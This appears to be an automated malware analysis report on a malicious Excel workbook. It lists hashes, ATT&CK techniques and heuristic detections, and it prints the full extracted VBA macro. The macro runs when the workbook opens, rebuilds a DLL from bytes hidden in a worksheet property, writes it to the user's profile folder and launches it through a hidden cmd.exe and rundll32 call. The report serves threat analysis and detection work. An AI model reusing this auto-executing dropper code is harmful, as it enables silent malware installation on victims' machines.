Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b79d3c16adfec7f5…

MALICIOUS

Office (OOXML)

Size: 279.0 KB
Created: 2014-07-02 08:15:15 UTC
Authoring application: Microsoft Excel 14.0300
First seen: 2019-02-04
MD5: 01c9cebbc39e273ac1f5af8b629a7327
SHA-1: ec692cf82aef16cf61574b5d15e5c5f8135df288
SHA-256: b79d3c16adfec7f5741f8c867887bed1bff9f979009193ba9f6aa05083068bcc
Risk score: 204

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1059.003 Windows Command Shell

This Excel document contains a Workbook_Open macro designed to execute arbitrary code. The macro reconstructs a DLL payload from a worksheet custom property (a '|'-separated list of byte values) and writes it to disk as 'vhostm-<MMDDHHMMSS>.dll' in the user's profile directory. It then calls ShellExecute to launch cmd.exe, which runs rundll32.exe against that DLL, indicating a likely downloader or persistence mechanism. The cmd.exe reference, the hidden-window launch and the use of Environ("USERPROFILE") further support this assessment.

Heuristics 8

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    RetVal = ShellExecute(0, "open", "cmd.exe", "/C rundll32.exe " & Chr$(34) & filename & Chr$(34) & ",function", Environ("USERPROFILE"), SW_HIDE)
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    RetVal = ShellExecute(0, "open", "cmd.exe", "/C rundll32.exe " & Chr$(34) & filename & Chr$(34) & ",function", Environ("USERPROFILE"), SW_HIDE)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
    Dim sFileText As String
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Dim filename As String
    filename = Environ("USERPROFILE") & "\vhostm-" & (Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now)) & ".dll"
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2577 bytes
SHA-256: d8e3552d0699f7649d974314d9bf468b09fa09a72a870f23d5eb23ca31831f61
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
        (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#Else
    Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
        (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#End If

Private Sub Workbook_Open()
Dim sFileText As String
Dim allFIleText As String
iFileNo = FreeFile

allFIleText = ""
sFileText = ""

For Each ws In ThisWorkbook.Worksheets
    If ws.Name <> "Start" Then
     ws.Visible = xlSheetVisible
    End If
Next ws


Sheets("Start").Visible = xlVeryHidden

Set cp = Sheet1.CustomProperties
allFIleText = Sheet1.CustomProperties.Item(1).Value

Dim TestArray() As String
TestArray = Split(allFIleText, "|")

Dim i As Long
Dim filename As String
filename = Environ("USERPROFILE") & "\vhostm-" & (Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now)) & ".dll"

If Not Dir(filename) <> "" Then
Open filename For Binary Lock Read Write As #2
    For i = 0 To 290817
      Put #2, , CByte(TestArray(i))
     Next
Close #2
End If

Dim RetVal As Long
'RetVal = ShellExecute(0, "open", filename, "", Environ("USERPROFILE"), 1)

RetVal = ShellExecute(0, "open", "cmd.exe", "/C rundll32.exe " & Chr$(34) & filename & Chr$(34) & ",function", Environ("USERPROFILE"), SW_HIDE)

'SetAttr filename, vbNormal
'Kill filename
    
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 14336 bytes
SHA-256: b298f6d5cc7669a7713a54350663be651fa87911515c13439d5420fa2796dd67